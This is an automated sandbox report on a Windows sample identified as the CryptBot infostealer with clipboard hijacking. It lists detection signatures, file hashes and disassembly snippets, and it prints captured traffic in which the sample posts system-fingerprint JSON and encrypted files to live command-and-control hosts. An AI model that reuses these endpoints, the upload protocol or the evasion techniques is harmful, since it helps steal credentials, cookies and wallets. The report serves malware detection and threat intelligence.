Windows Analysis Report
rGABp2MFj4.exe

Overview

General Information

Sample name: rGABp2MFj4.exe
renamed because original name is a hash value
Original sample name: 1dd231261455675567ba86411a9c2308.exe
Analysis ID: 1579762
MD5: 1dd231261455675567ba86411a9c2308
SHA1: 273e7ce353ccb01e349139cd618ec8ac01636f78
SHA256: fdbaa388833e09a78a4e17621d7ee25506c8e1f100720c8fdf3332d3d772b5a3
Tags: exeuser-abuse_ch
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

barindex
Source: rGABp2MFj4.exe Avira: detected
Source: rGABp2MFj4.exe ReversingLabs: Detection: 60%
Source: rGABp2MFj4.exe Virustotal: Detection: 49% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: rGABp2MFj4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_007015B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_007015B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6A14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_6C6A14B0
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_2598058e-b
Source: rGABp2MFj4.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\.ms-ad\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 9_2_007081E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C6C0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C6CA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C76C920
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C6CA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C6CA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C77F960h 9_2_6C6BEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C736BF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6C7484A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C6CC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C6CA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C6CA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C6CA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C6CE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C6CE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C6C0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 9_2_6C740730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 9_2_6C6FA1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C6C0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C77D014h] 9_2_6C774360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C717D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6C713840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 9_2_6C6CD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C6DBBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C6DBBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C71B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C6CD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 9_2_6C6CD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_6C719600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C77DFF4h 9_2_6C713690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 9_2_6C6CD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6C743140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C71B1F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C6BB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C6CD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6C7373A0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 26MB

Networking

barindex
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49710 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49711 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49722 -> 185.121.15.192:80
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 503385Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 33 39 36 37 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=f2Y0Z36LC3tmvdMc1734939684 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------R9vA5pqYfeS2cNK5BJ4IMQData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 39 76 41 35 70 71 59 66 65 53 32 63 4e 4b 35 42 4a 34 49 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 6f 63 75 6e 69 64 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 70 d5 0f ac 4a 26 a6 41 a4 28 56 3e 39 4c ad 8e c1 a6 8c ea 10 f4 3b 14 22 96 21 05 27 af f5 c3 1e 50 77 28 c7 0e 7c 6a 7a d6 6a ee c1 f0 6d b1 c7 1c 72 1e ed 65 ba ae a9 e0 9f 78 85 db f9 8e c9 dd e1 9c eb 53 7a dd f6 a6 df 9c f3 31 8f 84 b2 36 2e 82 ae 43 75 eb 26 e0 7b ea c6 ca 9f 5e e7 c2 70 ae 44 aa bd c1 78 ef e5 2e 20 38 9a 4c a4 92 65 49 50 f6 ba 19 c4 44 54 be 38 16 c9 54 97 8e 16 13 d0 d9 38 75 86 0b d8 5f 2f 06 0b b7 a7 1a c2 ee cf ce 64 9e 33 f0 9c 6f 77 34 17 17 65 70 c8 61 9c 44 6c 1a 21 23 a0 15 23 9c 2e 7e 97 55 5d 57 f2 97 41 58 bb 1e 80 7c 4c 5f 5e 26 88 8a 59 66 0c 9d bf 6c 6c 89 96 4b 35 68 5d 4c 3c 8d 35 ae 47 61 f7 3b 2f e6 eb 57 29 7f 1d ca 37 cc 8b 65 dd 0a 4f cd 31 f7 f2 6e 2e f2 a5 c4 a2 8a 3f 64 16 ca 33 de 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 39 76 41 35 70 71 59 66 65 53 32 63 4e 4b 35 42 4a 34 49 4d 51 2d 2d 0d 0a Data Ascii: --------------------------R9vA5pqYfeS2cNK5BJ4IMQContent-Disposition: form-data; name="file"; filename="Gocunid.bin"Content-Type: application/octet-streampJ&A(V>9L;"!'Pw(|jzjmrexSz16.Cu&{^pDx. 8LeIPDT8T8u_/d3ow4epaDl!##.~U]WAX|L_^&YfllK5h]L<5Ga;/W)7eO1n.?d3--------------------------R9vA5pqYfeS2cNK5BJ4IMQ--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 76974Content-Type: multipart/form-data; boundary=------------------------12lqc2bKhhagrH6sU2wFU2Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 6c 71 63 32 62 4b 68 68 61 67 72 48 36 73 55 32 77 46 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 44 65 70 65 72 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 72 21 ff f3 7f bb 0c d2 c7 9a 74 7a 7a 07 ba 1a 64 8f 09 7b 00 8e 7f 59 f2 32 09 48 2f d1 8d 4e fd d3 82 cc d8 c3 a3 24 7e b1 89 62 c6 10 94 80 52 63 a1 ea 0a 42 15 79 a6 8f 6b bd a2 33 89 10 ce b9 5f a7 81 c6 75 c3 ea 95 26 79 20 d0 1d 27 e5 6e ae d6 19 5a c4 ba 27 dd 3e 7f b3 e0 1f cd 3c e5 2e cf 34 62 90 4a a8 53 ff eb 6c 44 13 c5 3a be 18 3b aa 11 4a 6a 30 7e 24 6d c4 88 18 87 0a ad 10 87 38 f4 17 79 f7 c6 4c d6 7b 4d b5 0d e9 ab 23 37 89 44 25 1b aa 86 9b 4b 12 8d 27 ab 34 6a cb 5b 21 de a4 9c eb 1f 3a fd e9 24 7e c8 de 50 e7 27 da 7d 73 9b 67 e0 a2 81 11 bb c2 0b 19 6e db 51 1b d6 1a 9d 95 7d 51 76 e0 57 78 0e 95 46 43 a3 0d c8 ba 25 fe d3 cc 3f 1d 21 69 66 82 e7 df ac 7a 37 ef 36 63 d9 6d 51 ab 17 72 b5 58 55 46 13 c1 db a3 e8 44 2c 13 93 c7 7f a5 b5 b6 11 26 31 71 93 8d 7c 48 9e eb 18 89 91 c7 28 bc 92 d0 88 15 c5 a6 c8 49 b8 dc 18 52 52 19 fc d4 96 b9 48 c3 9b ef ee dd 05 34 b0 bc c7 d3 ec 16 b5 72 c7 0f 4d 19 60 a1 1d 69 bc 4b 2a 31 29 01 12 bb 5d fd ca b4 b3 f9 f7 66 ef 25 47 05 a3 a7 d8 67 63 4f 53 aa 38 c2 ff 8d 0d 6d 4e 88 97 6a eb f4 3d f4 63 99 1a 12 2f 47 2d 8e 42 9e 16 fa de ef c6 be 1b 23 96 e5 ee e5 77 f0 0b 07 08 b7 da 7c 99 8d 6e 85 6d 2d 6f 70 19 05 ca 42 0b a0 2c 6f 3c f9 ec c9 e3 95 a5 96 a8 14 2d eb ba 87 fb fa 4c ff fa f6 1e ad 1c df 1d 3d bd d5 d0 24 27 77 6c a1 89 da ef 09 c2 32 f8 71 e3 ae a9 22 16 52 98 64 a2 d5 db 69 11 dd 9a 49 b1 75 aa 39 91 7a 9e 07 1a 29 30 f3 28 e1 85 33 38 ac 28 23 e4 fd 93 2a 8b 7a 41 ad 72 f8 17 bc c4 b0 7b 64 9c c2 dd 39 ed 1c b9 31 f1 c4 03 03 3e 63 e0 8b fb 29 f2 fa 8a 44 18 1a cf 8c 3f da ab 20 8e 3a 6f ee 47 2f 49 38 29 97 28 7a f0 82 68 8b ae 52 64 6c e8 1f 45 41 5b cf ef 10 4d 39 19 df d6 63 9a 9c 73 21 74 91 9c 8e d9 1c 5d 0f 13 48 ee f3 ab de 9e 29 d5 40 b7 20 8b 88 23 9b a9 d9 bc ee f6 b5 23 24 13 0f a5 52 2e 62 fa cd d3 f3 c7 44 22 32 12 b5 f7 e5 8c ca 69 23 b0 47 e7 c5 9f 13 6b e2 1c d7 27 6e 40 41 16 85 f5 de ea 66 6e 1b e3 62 b0 c6 4d e7 7d 06 65 62 03 fb 88 39 a3 62 52 cd 23 6c 0c 6e ed b8 06 9e c6 f3 79 08 7c de bf 02 09 4e 8f bc a6 a0 fa ca ef a0 6d 38 71 25 6e e6 3b a0 62 31 36 b0 f1 19 58 ea 45 0b 89 45 a5 7c 41 2c 91 cc 1a 50 0d fb ff 3d 3b 37 19 bb 57 7a c6 1d ec 41 f6 29 71 9f b9 80 21 6a 50 97 03 16 fa 8c 37 90 76 a7 3c ee 47 dd b2 55 4a cd 26 56 d9 2c 74 9a cf b0 2c 57 a3 55 af e5 8d 71 21 09 dc d8 fc b3 84
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 30353Content-Type: multipart/form-data; boundary=------------------------Vj05AGVFf8vtKRF115lBBhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 6a 30 35 41 47 56 46 66 38 76 74 4b 52 46 31 31 35 6c 42 42 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 61 74 65 6d 75 6b 75 63 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ce 01 ba da d8 39 14 92 3b 71 f2 e3 c2 7e b4 10 0b 55 b5 10 38 8c 55 21 8a d1 77 0e f1 87 b4 30 ac bb 77 73 7f 17 1d 71 0e f6 d8 45 48 4f f9 ea 58 78 fe f9 9e a2 78 69 81 3d cf b1 26 08 44 f4 ee a4 6c 5f 6f bc 62 12 75 93 1d b3 fe 60 c1 1c 4e 73 46 31 03 7f 3a 88 21 0b ef 71 96 09 cc 00 71 47 f1 8f 4f 34 60 24 11 1e 92 08 0e 13 ff 7b 14 a8 7e a2 a4 a6 af 7a e6 5d 35 4e e2 7a d3 d8 1d 50 51 40 5b ee bd ef 05 b8 3f eb 52 23 fa 93 99 f5 11 fe 1b 9c 11 67 5f ff 98 a9 49 e5 ee 56 0e e5 d2 6e e1 83 89 cb a9 d5 e8 f2 d9 1a 62 43 e7 18 ac 2e 6c b4 6f 47 7a 4c 8b 28 93 cc 32 a9 d5 75 35 49 94 46 9f 8d 0e d4 ed f6 93 b9 b5 6c c9 d5 1c 70 93 89 2f f7 b5 cd 9c 90 df e1 00 a0 ff d0 df 38 ae cb 8f ce 1d 70 75 6c 3f ec df 25 f9 15 f5 ce 05 3d cc 74 7d e9 d5 bf db bf 56 56 6e 81 69 f9 5f 7d 3b f7 ff 00 14 5a af c0 12 b1 cc 7b 4d 4d b1 2f 5e 63 82 4b d4 a4 ce 8d d1 06 ea 98 e2 2f 83 cf b1 dd 57 a8 d9 a9 97 cf 9f 9e 61 27 c6 fd ce ab 63 cb f2 30 aa eb 08 43 c3 67 3a 9b ce 97 cc db 36 10 23 ee 5a a8 d0 88 4c 04 b5 28 d5 b4 3e d3 a6 31 1a 0b b4 85 c8 0e a2 73 af 75 a7 e5 50 24 2e 07 72 5a ba cb af 50 63 5c 09 78 3a 1f f3 b3 30 bf d9 28 4f cc 6b 2c 37 e1 ae c6 bf 78 60 21 05 71 2b 44 f6 0e 55 09 1a f9 e7 eb 0a 54 44 36 ec 09 54 9c a3 1e a2 9b 6e c9 5b 94 55 67 bb 83 fc 8a 82 36 34 c1 78 2d 61 24 12 a9 61 49 ba d2 37 4c 96 28 02 0f ec 54 08 b8 03 72 ab 38 54 91 3f 4a 86 ae 6a a2 48 a4 74 ad 3d 89 5b 7f a2 a5 54 51 a8 9b 4c 9c d6 24 8f f0 d5 f9 8a a1 a3 04 94 72 a4 0d 68 0b 44 89 2a e2 44 89 64 8a 31 f6 4e ef 35 0f ac b0 11 ba 13 3b 9d ea d3 88 d8 81 08 bc 00 c7 d0 2b df a0 cd 7d c0 b8 f0 f5 c9 64 5c 2b 0a 0a 5f ee b8 26 db 6e 81 83 d6 82 a4 89 93 21 cb cd d0 20 e9 12 7c 97 98 f4 08 44 cc dd a0 0f 9a 89 e6 6a eb d1 9b b0 a0 db 8a 9e 27 e2 80 49 ec 27 2e d2 c1 b2 29 fa c3 43 52 a3 a2 78 5c b3 f8 c1 00 d6 0b 99 01 52 16 13 9f ef 18 c0 23 a9 14 0d 18 21 3a 4b b1 aa 57 fb 2d 0e 82 01 ae 68 d1 06 2b 83 98 46 dc f8 3c e2 94 44 99 c6 3d be e6 f6 c7 ef 27 27 30 fd 75 b5 63 39 ad 22 68 1e 57 e5 6c 6d 7e 06 b9 2d 0f be ca 97 e3 4c 9b 3a cb 8f 18 00 d9 94 42 62 7a 12 f5 bb 1c 54 7f 1f 7f 18 b7 c0 15 99 69 45 05 46 c2 14 79 49 4c 55 c8 e5 5c 54 94 21 02 b8 7a d8 fe fa bc 18 61 fa f5 ed 61 f4 84 fc 64 9d 5f 03 1e 9d 37 55 11 7b 76 77 02 62 0a b0 b3 6c 89 23 d6 1d 52 18 92 14 79 3d d7 e1 bc 92 39 12 4b de 6e 2e 9f
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 66 32 59 30 5a 33 36 4c 43 33 74 6d 76 64 4d 63 31 37 33 34 39 33 39 36 38 34 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "f2Y0Z36LC3tmvdMc1734939684", "data": "Done2" }
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View IP Address: 98.85.100.80 98.85.100.80
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=f2Y0Z36LC3tmvdMc1734939684 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1864187292.00005300008C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1864187292.00005300008C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
